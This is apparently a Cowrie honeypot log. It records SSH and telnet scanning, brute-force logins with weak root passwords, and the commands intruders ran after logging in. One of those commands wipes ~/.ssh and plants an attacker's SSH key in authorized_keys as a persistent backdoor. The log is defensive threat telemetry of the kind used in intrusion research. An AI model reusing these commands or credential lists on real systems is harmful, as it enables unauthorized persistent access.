{"eventid":"cowrie.session.connect","src_ip":"116.196.70.63","src_port":53324,"dst_ip":"1.2.3.4","dst_port":22,"session":"42654a1a297e","protocol":"ssh","message":"New connection: 116.196.70.63:53324 (1.2.3.4:22) [session: 42654a1a297e]","sensor":"my-vps","timestamp":"2025-09-08T23:33:06.781362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:33:06.782524Z","src_ip":"116.196.70.63","session":"42654a1a297e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T23:33:06.990857Z","src_ip":"116.196.70.63","session":"42654a1a297e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52854,"dst_ip":"1.2.3.4","dst_port":22,"session":"825023b33622","protocol":"ssh","message":"New connection: 212.227.235.229:52854 (1.2.3.4:22) [session: 825023b33622]","sensor":"my-vps","timestamp":"2025-09-08T23:33:09.159142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:33:09.160796Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:33:09.472390Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer123.com","message":"login attempt [root/qwer123.com] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:33:10.897098Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:33:11.592686Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:33:11.593487Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:33:11.594445Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:11.924348Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":44054,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a20fc6ef0cc","protocol":"ssh","message":"New connection: 46.101.8.63:44054 (1.2.3.4:22) [session: 7a20fc6ef0cc]","sensor":"my-vps","timestamp":"2025-09-08T23:33:12.459102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:33:12.459838Z","src_ip":"46.101.8.63","session":"7a20fc6ef0cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:33:12.483219Z","src_ip":"46.101.8.63","session":"7a20fc6ef0cc"}
{"eventid":"cowrie.login.failed","username":"roo","password":"0","message":"login attempt [roo/0] failed","sensor":"my-vps","timestamp":"2025-09-08T23:33:12.620391Z","src_ip":"46.101.8.63","session":"7a20fc6ef0cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:33:12.800344Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:33:12.801136Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:33:13.113272Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:13.114450Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52860,"dst_ip":"1.2.3.4","dst_port":22,"session":"d52ef1bea5f5","protocol":"ssh","message":"New connection: 212.227.235.229:52860 (1.2.3.4:22) [session: d52ef1bea5f5]","sensor":"my-vps","timestamp":"2025-09-08T23:33:13.441993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:33:13.442813Z","src_ip":"212.227.235.229","session":"d52ef1bea5f5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:13.645786Z","src_ip":"46.101.8.63","session":"7a20fc6ef0cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:33:13.766751Z","src_ip":"212.227.235.229","session":"d52ef1bea5f5"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:14.781659Z","src_ip":"116.196.70.63","session":"42654a1a297e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:33:15.587742Z","src_ip":"212.227.235.229","session":"d52ef1bea5f5"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:17.260586Z","src_ip":"212.227.235.229","session":"d52ef1bea5f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58432,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5b3607def67","protocol":"ssh","message":"New connection: 212.227.235.229:58432 (1.2.3.4:22) [session: a5b3607def67]","sensor":"my-vps","timestamp":"2025-09-08T23:33:17.557119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:33:17.558120Z","src_ip":"212.227.235.229","session":"a5b3607def67"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:33:17.859842Z","src_ip":"212.227.235.229","session":"a5b3607def67"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:33:19.071410Z","src_ip":"212.227.235.229","session":"a5b3607def67"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:19.380929Z","src_ip":"212.227.235.229","session":"a5b3607def67"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:19.382323Z","src_ip":"212.227.235.229","session":"825023b33622"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":59288,"dst_ip":"1.2.3.4","dst_port":22,"session":"4685b6ff2a1b","protocol":"ssh","message":"New connection: 3.131.215.38:59288 (1.2.3.4:22) [session: 4685b6ff2a1b]","sensor":"my-vps","timestamp":"2025-09-08T23:33:26.027670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:33:26.028480Z","src_ip":"3.131.215.38","session":"4685b6ff2a1b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T23:33:26.165854Z","src_ip":"3.131.215.38","session":"4685b6ff2a1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60610,"dst_ip":"1.2.3.4","dst_port":23,"session":"6420f373a308","protocol":"telnet","message":"New connection: 212.227.235.229:60610 (1.2.3.4:23) [session: 6420f373a308]","sensor":"my-vps","timestamp":"2025-09-08T23:33:31.541600Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:33:32.153597Z","src_ip":"212.227.235.229","session":"6420f373a308"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:33:32.212112Z","src_ip":"212.227.235.229","session":"6420f373a308"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T23:33:32.213579Z","src_ip":"212.227.235.229","session":"6420f373a308"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T23:33:32.214468Z","src_ip":"212.227.235.229","session":"6420f373a308"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:36.028870Z","src_ip":"3.131.215.38","session":"4685b6ff2a1b"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":53088,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b9ac2a58453","protocol":"ssh","message":"New connection: 182.18.161.165:53088 (1.2.3.4:22) [session: 0b9ac2a58453]","sensor":"my-vps","timestamp":"2025-09-08T23:33:44.780250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:33:44.781296Z","src_ip":"182.18.161.165","session":"0b9ac2a58453"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:33:45.035062Z","src_ip":"182.18.161.165","session":"0b9ac2a58453"}
{"eventid":"cowrie.login.failed","username":"runcloud","password":"runcloud","message":"login attempt [runcloud/runcloud] failed","sensor":"my-vps","timestamp":"2025-09-08T23:33:46.093317Z","src_ip":"182.18.161.165","session":"0b9ac2a58453"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":37904,"dst_ip":"1.2.3.4","dst_port":22,"session":"daddf6f0e06a","protocol":"ssh","message":"New connection: 93.113.63.124:37904 (1.2.3.4:22) [session: daddf6f0e06a]","sensor":"my-vps","timestamp":"2025-09-08T23:33:46.611094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:33:46.612077Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:33:46.682374Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.login.success","username":"root","password":"qqqq0000","message":"login attempt [root/qqqq0000] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.060475Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:33:47.258530Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.259206Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.259950Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
